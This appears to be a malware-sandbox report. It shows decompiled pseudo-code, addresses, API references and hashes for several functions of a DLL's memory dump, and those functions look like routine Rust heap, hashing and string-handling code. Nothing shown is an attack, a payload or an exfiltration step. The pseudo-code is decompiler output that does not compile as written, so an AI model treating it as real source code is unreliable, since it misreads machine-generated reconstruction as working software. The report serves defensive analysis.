				 *((long long*)(_t259 + 0x20)) = _t251;
				_t280 =  *((intOrPtr*)(__rcx + 8));
				 *((long long*)(_t259 + 0x28)) = _t280 - 0xa8;
				if ( *((char*)(_t280 + __rcx)) < 0) goto 0xf310077f;
				_t155 =  ~__rcx;
				_t88 = E000007FE7FEF30AA570( *((intOrPtr*)(_t259 + 0x30)),  *((intOrPtr*)(_t259 + 0x38)), _t155 * 0xa8 +  *((intOrPtr*)(_t259 + 0x28)));
				asm("movdqu xmm0, [esi+ecx]");
				asm("pmovmskb edx, xmm0");
				if (0xff != 0) goto 0xf310071f;
				asm("movdqu xmm0, [esi+ecx]");
				asm("pmovmskb edx, xmm0");
				if (0xff == 0) goto 0xf3100708;
				asm("bsf dx, dx");
				_t254 = _t251 + 0x00000010 + ((_t155 & _t176) + _t251 & _t176) & _t176;
				if ( *((char*)(_t242 + _t254)) < 0) goto 0xf3100741;
				asm("movdqa xmm0, [esi]");
				asm("pmovmskb ecx, xmm0");
				asm("bsf cx, cx");
				 *((char*)(_t242 + _t254)) = _t88;
				 *((char*)((_t254 - 0x00000010 & _t176) + _t242 + 0x10)) = _t88;
				r8d = 0xa8;
				E000007FE7FEF30F1E10();
				_t43 = _t236 + 1; // 0x1
				if (__rcx != _t276) goto 0xf31006c4;
				 *__rcx = _t176;
				 *((long long*)(__rcx + 8)) = _t242;
				 *((long long*)(__rcx + 0x10)) =  *((intOrPtr*)(_t259 + 0x20));
				if (_t276 != 0) goto 0xf3100954;
				goto 0xf3100932;
				asm("repe inc ecx");
				asm("repe inc ebx");
				 *((long long*)(_t259 + 0x20)) = _t280 - 0xa8;
				r12d = 0;
				_t243 = _t280;
				if ( *((char*)(_t280 + _t271)) != 0x80) goto 0xf3100907;
				 *((long long*)(_t259 + 0x28)) = _t271 * 0xffffff58 + _t280 + 0xffffff58;
				_t163 =  ~_t271;
				_t89 = E000007FE7FEF30AA570( *((intOrPtr*)(_t259 + 0x30)),  *((intOrPtr*)(_t259 + 0x38)), _t163 * 0xa8 +  *((intOrPtr*)(_t259 + 0x20)));
				_t256 = _t163 & _t276;
				asm("repe inc ecx");
				asm("pmovmskb edx, xmm0");
				if (0xff != 0) goto 0xf310084a;
				asm("repe inc ecx");
				asm("pmovmskb edx, xmm0");
				if (0xff == 0) goto 0xf3100832;
				asm("bsf dx, dx");
				_t240 = _t43 + 0x00000010 + (_t256 + _t43 & _t276) & _t276;
				if ( *((char*)(_t280 + _t240)) < 0) goto 0xf310086e;
				asm("inc cx");
				asm("pmovmskb ecx, xmm0");
				asm("bsf cx, cx");
				if (((_t240 - _t256 ^ _t271 - _t256) & _t276) - 0x10 < 0) goto 0xf31008ca;
				_t214 = _t240 * 0xffffff58 + _t280;
				_t56 = _t240 - 0x10; // -16
				_t258 = _t56 & _t276;
				 *((char*)(_t280 + _t240)) = _t89;
				 *((char*)(_t258 + _t280 + 0x10)) = _t89;
				_t143 =  *((intOrPtr*)(_t280 + _t240)) - 0xff;
				if (_t143 == 0) goto 0xf31008e1;
				 *((char*)(_t243 + 0xffffff58)) =  *((intOrPtr*)(_t214 + 0xffffff58));
				 *((char*)(_t214 + 0xffffff58)) =  *((intOrPtr*)(_t243 + 0xffffff58));
				if (_t143 != 0) goto 0xf31008b4;
				goto 0xf3100801;
				_t64 = _t271 - 0x10; // -16
				 *((char*)(_t280 + _t271)) = _t89;
				 *((char*)((_t64 & _t276) + _t280 + 0x10)) = _t89;
				goto 0xf3100907;
				_t68 = _t271 - 0x10; // -16
				 *((char*)(_t280 + _t271)) = 0xff;
				 *((char*)((_t68 & _t276) + _t280 + 0x10)) = 0xff;
				r8d = 0xa8;
				E000007FE7FEF30F1E10();
				_t73 = _t271 + 1; // 0x1
				if (_t271 != _t276) goto 0xf31007cb;
				 *((long long*)( *((intOrPtr*)(_t259 + 0x50)) + 0x10)) =  *((intOrPtr*)(_t259 + 0x40)) -  *((intOrPtr*)(_t259 + 0x48));
				goto 0xf310098f;
				goto 0xf310098f;
				 *_t240 = _t176;
				 *((long long*)(_t240 + 8)) =  *((intOrPtr*)(_t259 + 0x70));
				 *(_t240 + 0x10) = _t258;
				if (_t276 + (_t73 + 0x0000000f & 0xfffffff0) == 0xffffffef) goto 0xf310098f;
				return HeapFree(??, ??, ??);
			}

0x7fef310052d
0x7fef3100532
0x7fef3100537
0x7fef310053e
0x7fef3100541
0x7fef3100547
0x7fef310054a
0x7fef310054d
0x7fef310054d
0x7fef3100566
0x7fef310056d
0x7fef3100573
0x7fef310057b
0x7fef3100583
0x7fef310059a
0x7fef310059f
0x7fef31005a4
0x7fef31005a9
0x7fef31005af
0x7fef31005bc
0x7fef31005be
0x7fef31005c2
0x7fef31005c7
0x7fef31005cd
0x7fef31005d5
0x7fef31005dc
0x7fef31005de
0x7fef31005e2
0x7fef31005e8
0x7fef31005ec
0x7fef31005f7
0x7fef31005f9
0x7fef3100602
0x7fef3100612
0x7fef3100617
0x7fef310061a
0x7fef3100620
0x7fef310062d
0x7fef3100653
0x7fef3100667
0x7fef3100667
0x7fef3100674
0x7fef3100679
0x7fef3100680
0x7fef3100686
0x7fef3100699
0x7fef310069e
0x7fef31006a4
0x7fef31006aa
0x7fef31006b2
0x7fef31006bd
0x7fef31006c9
0x7fef31006d2
0x7fef31006eb
0x7fef31006f6
0x7fef31006fb
0x7fef3100701
0x7fef310070e
0x7fef3100713
0x7fef310071d
0x7fef310071f
0x7fef3100729
0x7fef3100730
0x7fef3100732
0x7fef3100736
0x7fef310073a
0x7fef310074c
0x7fef310074f
0x7fef3100774
0x7fef310077a
0x7fef310077f
0x7fef3100789
0x7fef310078f
0x7fef3100793
0x7fef310079c
0x7fef31007a3
0x7fef31007a9
0x7fef31007ae
0x7fef31007b3
0x7fef31007c0
0x7fef31007c5
0x7fef31007c8
0x7fef31007d0
0x7fef31007ea
0x7fef31007f2
0x7fef310080e
0x7fef3100816
0x7fef3100819
0x7fef310081f
0x7fef3100828
0x7fef3100838
0x7fef310083e
0x7fef3100848
0x7fef310084a
0x7fef3100854
0x7fef310085c
0x7fef310085e
0x7fef3100863
0x7fef3100867
0x7fef3100884
0x7fef310088d
0x7fef3100898
0x7fef310089c
0x7fef310089f
0x7fef31008a3
0x7fef31008af
0x7fef31008b2
0x7fef31008ba
0x7fef31008bd
0x7fef31008c3
0x7fef31008c5
0x7fef31008ce
0x7fef31008d6
0x7fef31008da
0x7fef31008df
0x7fef31008e4
0x7fef31008ee
0x7fef31008f2
0x7fef31008f7
0x7fef3100902
0x7fef3100907
0x7fef3100919
0x7fef310092e
0x7fef310093c
0x7fef3100943
0x7fef3100949
0x7fef310094c
0x7fef3100950
0x7fef3100978
0x7fef31009a2

APIs

HeapFree.KERNEL32 ref: 000007FEF3100989

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: a4efa788f3acdbc58bcf389b8f8335c05357081e105a2e59075ec1828d782fa4
Instruction ID: f786ebbee6abd0a9ac77141d5199074cf339bb2b0379015424b6c070df9c895e
Opcode Fuzzy Hash: a4efa788f3acdbc58bcf389b8f8335c05357081e105a2e59075ec1828d782fa4
Instruction Fuzzy Hash: D0B145B2F18B818AEE54CB2994153796791E795BA0F4587369EFE077E8EB3CD041E300

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF305A103 Relevance: 1.5, Strings: 1, Instructions: 263
COMMONCrypto

Download Yara Rule

C-Code - Quality: 77%

			E000007FE7FEF305A103(long long __rax, long long* __rcx) {
				void* _t2;

				E000007FE7FEF305A520();
				if (__rax == 0) goto 0xf305a165;
				r8d = 0x2aea;
				E000007FE7FEF30F24C0();
				r8d = 0x8010;
				E000007FE7FEF30F24C0();
				 *((intOrPtr*)(__rax + 0xab00)) = 0x1020001;
				asm("xorps xmm0, xmm0");
				asm("movups [esi+0x8], xmm0");
				 *__rcx = __rax;
				return _t2;
			}

0x7fef305a116
0x7fef305a11e
0x7fef305a123
0x7fef305a12e
0x7fef305a13d
0x7fef305a145
0x7fef305a14a
0x7fef305a154
0x7fef305a157
0x7fef305a15b
0x7fef305a164

Strings

called `Result::unwrap()` on an `Err` value, xrefs: 000007FEF305A506

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID: HeapProcess
String ID: called `Result::unwrap()` on an `Err` value
API String ID: 54951025-2333694755
Opcode ID: e6531d1c4feb62387959813cb0119cd36b14b3e9f4b13d2d461a475cb9992012
Instruction ID: 7028d630abf7a2bc999a1069c46ec990e14684d90f8276b5aeee6baedd0d51ab
Opcode Fuzzy Hash: e6531d1c4feb62387959813cb0119cd36b14b3e9f4b13d2d461a475cb9992012
Instruction Fuzzy Hash: 13A138366087824AE7E58A65A4147BE37D2FB85798F0442369E9D07BE5CF3CD480EB10

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30C44DE Relevance: 1.4, APIs: 1, Instructions: 193
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 65%

			E000007FE7FEF30C44DE(void* __eflags, long long* __rcx, long long __rdx, long long __r8) {
				char _v88;
				long long _v96;
				long long _v104;
				char _v112;
				long long _v120;
				signed int _t43;
				signed char _t51;
				void* _t63;
				signed int _t73;
				void* _t79;
				void* _t80;
				signed int _t86;
				void* _t90;
				long long _t95;
				long long _t103;
				long long _t114;
				void* _t117;
				intOrPtr* _t121;
				void* _t124;
				void* _t136;
				long long* _t137;
				signed char* _t139;
				long long _t143;
				signed char* _t144;

				_t139 = __rdx;
				_t137 = __rcx;
				if (__eflags == 0) goto 0xf30c4627;
				r10d = 0;
				r9d = 0x2600;
				_t51 =  *((intOrPtr*)(__rdx));
				if (bpl < 0) goto 0xf30c452c;
				_t117 = __rdx + 1;
				goto 0xf30c4581;
				if (bpl - 0xdf <= 0) goto 0xf30c456b;
				if (_t51 - 0xf0 < 0) goto 0xf30c4578;
				goto 0xf30c4581;
				goto 0xf30c4581;
				_t73 = (_t51 & 7) << 0x00000012 << 0x00000006 |  *(_t117 + 3) & 0x3f | ( *(_t117 + 2) & 0x3f | ( *(_t117 + 1) & 0x3f) << 0x00000006) << 0x00000006 | (_t51 & 7) << 0x00000012 | ((_t51 & 7) << 0x00000012 << 0x00000006 |  *(_t117 + 3) & 0x3f | ( *(_t117 + 2) & 0x3f | ( *(_t117 + 1) & 0x3f) << 0x00000006) << 0x00000006 | (_t51 & 7) << 0x00000012) << 0x0000000c;
				_t79 = _t73 - 0x3f;
				if (_t79 > 0) goto 0xf30c45aa;
				asm("dec ecx");
				if (_t79 >= 0) goto 0xf30c45a4;
				r10b = 1;
				_t80 = _t117 + 9 - __r8;
				if (_t80 != 0) goto 0xf30c451d;
				goto 0xf30c45e0;
				asm("dec ecx");
				if (_t80 < 0) goto 0xf30c45e0;
				if (_t73 == 0x110000) goto 0xf30c45e0;
				if (_t73 == 0x5c) goto 0xf30c45e0;
				if (_t73 - 0x80 < 0) goto 0xf30c4596;
				if (_t73 - 0x800 < 0) goto 0xf30c4596;
				asm("dec eax");
				goto 0xf30c4596;
				_v112 = __rdx;
				_v104 = __r8;
				_t86 = r10b & 0x00000001;
				if (_t86 == 0) goto 0xf30c4635;
				_t121 =  &_v88;
				 *_t121 = 1;
				asm("xorps xmm0, xmm0");
				asm("movups [edi+0x8], xmm0");
				E000007FE7FEF30BDF42(_t121,  &_v112, _t124 + 1);
				_t143 =  *_t121;
				_v96 =  *((intOrPtr*)(_t121 + 8));
				_t103 =  *((intOrPtr*)(_t121 + 0x10));
				goto 0xf30c4690;
				_v112 = __r8;
				_v104 = __r8;
				if (_t86 == 0) goto 0xf30c4651;
				if (E000007FE7FEF30BDE7C( &_v112) != 0x110000) goto 0xf30c463d;
				if (_t103 == 0) goto 0xf30c4681;
				if (_t103 - _t143 >= 0) goto 0xf30c4688;
				_t90 = _t139[_t103] - 0xbf;
				if (_t90 > 0) goto 0xf30c468a;
				_v120 = 0xf314d200;
				_t114 = _t143;
				r8d = 0;
				E000007FE7FEF30FE410(0, _t51, 4, _t63, _t90, _t139, _t114, _t124 + 1, _t103, _t136);
				asm("ud2");
				bpl = 1;
				goto 0xf30c46ef;
				if (_t90 != 0) goto 0xf30c4662;
				bpl = 1;
				_t144 = _t139;
				if (_t103 != 2) goto 0xf30c46ec;
				if (( *_t144 & 0xdf) + 0xffffffbf - 0x19 > 0) goto 0xf30c46ec;
				_t43 = _t144[1] & 0x000000ff;
				if (_t43 == 0x3a) goto 0xf30c46be;
				if (_t43 != 0x7c) goto 0xf30c46ec;
				 *_t137 = 1;
				asm("xorps xmm0, xmm0");
				asm("inc ecx");
				 *((char*)(_t137 + 0x18)) = 0;
				 *(_t137 + 0x20) = _t139;
				 *((long long*)(_t137 + 0x28)) = __r8;
				_t95 = _v96;
				bpl = bpl | _t43 & 0xffffff00 | _t95 == 0x00000000;
				if (_t95 == 0) goto 0xf30c4737;
				goto 0xf30c4749;
				E000007FE7FEF306239E(0xf314d200, _t103);
				E000007FE7FEF30F1E10();
				asm("movups xmm0, [esp+0x28]");
				 *_t137 = 0xf314d200;
				 *((long long*)(_t137 + 8)) = _t114;
				 *((long long*)(_t137 + 0x10)) = _t103;
				 *((char*)(_t137 + 0x18)) = 1;
				asm("inc ecx");
				if (bpl != 0) goto 0xf30c4749;
				if (_v96 == 0) goto 0xf30c4749;
				return HeapFree(??, ??, ??);
			}

0x7fef30c44f1
0x7fef30c44f4
0x7fef30c44fd
0x7fef30c4503
0x7fef30c4506
0x7fef30c451d
0x7fef30c4525
0x7fef30c4527
0x7fef30c452a
0x7fef30c453c
0x7fef30c454d
0x7fef30c4569
0x7fef30c4576
0x7fef30c457f
0x7fef30c4586
0x7fef30c4589
0x7fef30c458d
0x7fef30c4591
0x7fef30c4593
0x7fef30c4599
0x7fef30c459c
0x7fef30c45a2
0x7fef30c45a4
0x7fef30c45a8
0x7fef30c45b0
0x7fef30c45b5
0x7fef30c45c0
0x7fef30c45cd
0x7fef30c45da
0x7fef30c45de
0x7fef30c45e0
0x7fef30c45e5
0x7fef30c45ea
0x7fef30c45ee
0x7fef30c45f0
0x7fef30c45f5
0x7fef30c45fc
0x7fef30c45ff
0x7fef30c460e
0x7fef30c4613
0x7fef30c461a
0x7fef30c461f
0x7fef30c4625
0x7fef30c4627
0x7fef30c462c
0x7fef30c4640
0x7fef30c464f
0x7fef30c4654
0x7fef30c4659
0x7fef30c465b
0x7fef30c4660
0x7fef30c4669
0x7fef30c4671
0x7fef30c4674
0x7fef30c467a
0x7fef30c467f
0x7fef30c4681
0x7fef30c4686
0x7fef30c4688
0x7fef30c468a
0x7fef30c468d
0x7fef30c4694
0x7fef30c46a8
0x7fef30c46aa
0x7fef30c46b7
0x7fef30c46bc
0x7fef30c46be
0x7fef30c46c6
0x7fef30c46c9
0x7fef30c46cf
0x7fef30c46d5
0x7fef30c46da
0x7fef30c46df
0x7fef30c46e5
0x7fef30c46e8
0x7fef30c46ea
0x7fef30c46f2
0x7fef30c4706
0x7fef30c470b
0x7fef30c4710
0x7fef30c4714
0x7fef30c4719
0x7fef30c471e
0x7fef30c4724
0x7fef30c472d
0x7fef30c4735
0x7fef30c475a

APIs

HeapFree.KERNEL32 ref: 000007FEF30C4743

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: dd7b531df5336e01bd2a176e1ed7e8f25979b3d3cf6b115bb62ffec94f1f120e
Instruction ID: 5da6f110e80d5f8a51593b017f1e1eea10917cb7e2785e5198d7ae6eb6b232ba
Opcode Fuzzy Hash: dd7b531df5336e01bd2a176e1ed7e8f25979b3d3cf6b115bb62ffec94f1f120e
Instruction Fuzzy Hash: B2613832E0C79149E6A68A21984837A76C2B3593D8F148233DE9D476F6EA3CE181A300

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF3058D70 Relevance: 1.4, Strings: 1, Instructions: 161
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E000007FE7FEF3058D70(intOrPtr* __rcx, void* __rdx, void* __r10) {
				char _v8;
				long long _v144;
				long long _v152;
				void* _t11;
				void* _t12;
				char* _t23;
				long long _t26;
				unsigned long long _t27;

				_t27 =  *((intOrPtr*)(__rcx));
				_t23 =  &_v8;
				r10d = 0;
				r8d = 0x30;
				_t11 =  <  ? r8d : 0x57;
				sil = sil + (r11d & 0x0000000f);
				 *((intOrPtr*)(_t23 - 1)) = sil;
				_t26 = __r10 + 1;
				if (_t27 - 0xf > 0) goto 0xf3058d90;
				if ((_t27 >> 4) - _t26 - 0x81 >= 0) goto 0xf3058df6;
				_v144 = _t26;
				_v152 = _t23 - 1;
				r9d = 2;
				return E000007FE7FEF3053920(1, _t12, __rdx, 0xf314cfc8, _t23 - 1);
			}

0x7fef3058d78
0x7fef3058d7b
0x7fef3058d83
0x7fef3058d86
0x7fef3058da0
0x7fef3058da4
0x7fef3058da7
0x7fef3058dae
0x7fef3058db8
0x7fef3058dc9
0x7fef3058dcb
0x7fef3058dd0
0x7fef3058ddc
0x7fef3058df5

Strings

called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value, xrefs: 000007FEF3058F94

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID: called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value
API String ID: 0-1586615424
Opcode ID: 3aa11c4675da4d2b5fd328b293ab57d033c622860c595640e0fe4da5de5aa4f8
Instruction ID: ba6f68f417fb5c0e89d2b717585506e110dad079b556bcbc4c5af2935a232736
Opcode Fuzzy Hash: 3aa11c4675da4d2b5fd328b293ab57d033c622860c595640e0fe4da5de5aa4f8
Instruction Fuzzy Hash: B2515672B1C68185E7A89B28E4153B96393F394740F809237EACE4BBE4CA3CC646D705

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30BCDB5 Relevance: 1.4, APIs: 1, Instructions: 137
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E000007FE7FEF30BCDB5(void* __ebx, void* __ecx, void* __edx, void* __edi, long long __rax, long long* __rcx, long long __rdx, long long __r8) {
				char _v72;
				char _v80;
				intOrPtr _v88;
				char _v96;
				char _v103;
				char _v104;
				char _v152;
				intOrPtr _v160;
				char _v168;
				void* _t83;
				long long _t88;
				void* _t91;
				long long _t94;
				intOrPtr* _t95;
				long long _t96;
				long long* _t101;
				long long* _t105;
				long long _t108;
				long long _t109;
				long long _t113;
				intOrPtr _t118;
				intOrPtr _t119;

				_t95 =  &_v72;
				E000007FE7FEF30515F0(__rax, _t95, __rdx, __r8);
				_t119 =  *_t95;
				_t118 =  *((intOrPtr*)(_t95 + 8));
				_t111 =  ==  ? _t118 : _t119;
				_t88 =  *((intOrPtr*)(_t95 + 0x10));
				_t105 =  &_v152;
				 *((long long*)(_t105 - 0x10)) = _t109;
				 *((long long*)(_t105 - 8)) = _t88;
				 *_t105 =  ==  ? _t118 : _t119;
				 *((long long*)(_t105 + 8)) = _t88;
				 *((long long*)(_t105 + 0x10)) = _t109;
				 *((long long*)(_t105 + 0x18)) = _t88;
				 *((long long*)(_t105 + 0x20)) = 1;
				 *((long long*)(_t105 + 0x28)) = 0xa;
				 *((short*)(_t105 + 0x30)) = 0;
				_t96 =  &_v96;
				E000007FE7FEF30A6A7C(_t96, _t105);
				if ( *_t96 == _t109) goto 0xf30bce67;
				_t91 = _v88 - _v168;
				_v168 = _v80;
				if (_t91 == 0) goto 0xf30bce90;
				_t108 =  !=  ? _t91 : _t91 - 1;
				goto 0xf30bce92;
				if (_v103 != 0) goto 0xf30bce8c;
				_t113 = _v168;
				if (_v104 != 0) goto 0xf30bcf97;
				if (_v160 != _t113) goto 0xf30bcf97;
				goto 0xf30bce92;
				if (_t113 == 0) goto 0xf30bcf3b;
				_t94 = _t113 + _t108;
				_t101 =  &_v168;
				 *_t101 = _t96;
				 *((long long*)(_t101 + 8)) = _t108;
				 *((long long*)(_t101 + 0x10)) = _t113;
				 *((long long*)(_t101 + 0x18)) = _t108;
				 *((long long*)(_t101 + 0x20)) = _t96;
				 *((long long*)(_t101 + 0x28)) = _t113;
				 *((long long*)(_t101 + 0x30)) = _t94;
				 *((short*)(_t101 + 0x38)) = 1;
				E000007FE7FEF30BCFD6(_t94, _t101);
				if (_t94 == 0) goto 0xf30bcf3b;
				E000007FE7FEF30BCFD6(_t94,  &_v168);
				if (_t94 == 0) goto 0xf30bcf3b;
				_t83 = _t108 - 3;
				if (_t83 != 0) goto 0xf30bcf33;
				if (_t83 == 0) goto 0xf30bcfa9;
				if (_t83 == 0) goto 0xf30bcfb7;
				if (_t83 == 0) goto 0xf30bcfb7;
				 *__rcx = _t94;
				goto 0xf30bcf46;
				 *__rcx = _t94;
				 *((long long*)(__rcx + 8)) = _t108;
				 *((intOrPtr*)(__rcx + 0x44)) = 2;
				 *((long long*)(__rcx + 0x70)) = _t94;
				 *((char*)(__rcx + 0x80)) = 0xa;
				 *((long long*)(__rcx + 0xc8)) = 2;
				if (_t119 == 0) goto 0xf30bcf85;
				if (_t118 == 0) goto 0xf30bcf85;
				return HeapFree(??, ??, ??);
			}

0x7fef30bcdc8
0x7fef30bcdd3
0x7fef30bcdd8
0x7fef30bcddb
0x7fef30bcde5
0x7fef30bcde9
0x7fef30bcdef
0x7fef30bcdf4
0x7fef30bcdf8
0x7fef30bcdfc
0x7fef30bcdff
0x7fef30bce03
0x7fef30bce07
0x7fef30bce0b
0x7fef30bce1d
0x7fef30bce21
0x7fef30bce27
0x7fef30bce2f
0x7fef30bce37
0x7fef30bce4b
0x7fef30bce4e
0x7fef30bce56
0x7fef30bce61
0x7fef30bce65
0x7fef30bce6c
0x7fef30bce73
0x7fef30bce7d
0x7fef30bce86
0x7fef30bce8e
0x7fef30bce95
0x7fef30bce9e
0x7fef30bcea3
0x7fef30bcea8
0x7fef30bceab
0x7fef30bceaf
0x7fef30bceb3
0x7fef30bceb7
0x7fef30bcebb
0x7fef30bcebf
0x7fef30bcec3
0x7fef30bcec9
0x7fef30bced1
0x7fef30bced8
0x7fef30bcee0
0x7fef30bcee2
0x7fef30bcee6
0x7fef30bcefb
0x7fef30bcf14
0x7fef30bcf2d
0x7fef30bcf35
0x7fef30bcf39
0x7fef30bcf3d
0x7fef30bcf41
0x7fef30bcf46
0x7fef30bcf4f
0x7fef30bcf54
0x7fef30bcf5d
0x7fef30bcf6c
0x7fef30bcf71
0x7fef30bcf96

APIs

HeapFree.KERNEL32 ref: 000007FEF30BCF7F

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: e91831327762196e46093648bc762dfedbdb5a3ccda3a11a666d2ed1fbd39aa6
Instruction ID: 33f762a84ff74306f54fa9778a68d443b291a31b1c44d562795c452b5cf2fc28
Opcode Fuzzy Hash: e91831327762196e46093648bc762dfedbdb5a3ccda3a11a666d2ed1fbd39aa6
Instruction Fuzzy Hash: F451E372A09B9199EBA4CB15E41432D77EAF748B84F448137DACD837A8EB7CD156D300

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF305A570 Relevance: 1.3, APIs: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,000007FEF3069508,?,?,?,?,000007FEF3041282), ref: 000007FEF305A584

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 58e259432f50249fec5c5ac0432e940adc4d3165e4b89b2fd128b86fbefdd30f
Instruction ID: 20e6db05f80ad9da1d423b84eced9cfa4a9ec7291817fcb269672afe04017789
Opcode Fuzzy Hash: 58e259432f50249fec5c5ac0432e940adc4d3165e4b89b2fd128b86fbefdd30f
Instruction Fuzzy Hash: 74E08672F1A5518DFED65B92784037521F1AB8CB90F448536988D46378EA2C54826300

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30E9600 Relevance: .9, Instructions: 863
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E000007FE7FEF30E9600(signed int __ebx, signed int __rax, signed int __rcx, signed int __rdx, signed int __r8, signed int __r9, signed int __r11) {
				signed char _t280;
				signed char _t282;
				signed char _t285;
				signed char _t287;
				signed char _t289;
				signed char _t292;
				signed char _t294;
				signed char _t297;
				signed char _t299;
				signed char _t302;
				signed char _t320;
				signed char _t322;
				signed long long _t334;
				signed long long _t335;
				signed long long _t336;
				signed long long _t337;
				signed long long _t338;
				signed long long _t339;
				unsigned long long _t341;
				unsigned long long _t345;
				unsigned long long _t351;
				signed long long _t353;
				unsigned long long _t357;
				unsigned long long _t363;
				unsigned long long _t367;
				unsigned long long _t384;
				unsigned long long _t389;
				unsigned long long _t392;
				signed long long _t410;
				unsigned long long _t412;
				unsigned long long _t416;
				signed long long _t422;
				unsigned long long _t425;
				unsigned long long _t431;
				signed long long _t474;
				signed long long _t478;
				signed long long _t548;
				signed long long _t550;
				signed long long _t552;
				signed long long _t554;
				signed long long _t557;
				signed long long _t574;
				signed long long _t578;
				signed long long _t586;
				signed long long _t596;
				signed long long _t603;
				signed long long _t610;
				signed long long _t613;
				signed long long _t621;
				signed long long _t627;
				signed long long _t635;
				signed long long _t650;
				signed long long _t653;
				signed long long _t654;
				signed long long _t657;
				signed long long _t698;
				signed long long _t700;
				unsigned long long _t704;
				signed long long _t716;
				signed long long _t719;
				signed long long _t726;
				signed long long _t732;
				signed long long _t735;
				signed long long _t738;
				signed long long _t740;
